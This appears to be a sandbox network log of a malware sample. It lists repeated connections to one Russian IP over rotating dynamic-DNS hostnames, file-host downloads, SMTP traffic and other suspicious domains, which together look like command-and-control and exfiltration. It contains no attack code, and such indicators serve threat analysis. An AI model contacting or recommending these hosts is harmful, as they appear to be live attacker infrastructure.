US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 mail.sarahfoils.com udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
IN 103.21.58.122:587 mail.sarahfoils.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 122.58.21.103.in-addr.arpa udp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 2subsmepjzqnvvukhd.fun udp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
NL 45.67.228.133:443 2subsmepjzqnvvukhd.fun tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 defrosscrappeo.pw udp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 133.228.67.45.in-addr.arpa udp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:7020 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 107.175.229.139:8087 tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 listpoints.click tcp
RU 91.215.85.63:7020 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:3839 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 listpoints.click tcp
RU 91.215.85.63:5225 listpoints.click tcp
RU 91.215.85.63:2718 listpoints.click tcp
RU 91.215.85.63:8118 listpoints.click tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
US 129.153.80.87:8855 tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
US 188.114.96.0:80 defrosscrappeo.pw tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 8.8.8.8:53 defrosscrappeo.pw udp
US 188.114.97.0:80 defrosscrappeo.pw tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 8.8.8.8:53 files.catbox.moe udp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 40.77.123.92.in-addr.arpa udp
US 129.153.80.87:8855 tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
US 8.8.8.8:53 clients2.google.com udp
US 108.177.126.138:443 clients2.google.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 8.8.8.8:53 202.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 138.126.177.108.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 108.177.126.138:443 clients2.google.com tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 44.236.198.167:80 api2.check-data.xyz tcp
US 8.8.8.8:53 167.198.236.44.in-addr.arpa udp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
US 8.8.8.8:53 files.catbox.moe udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
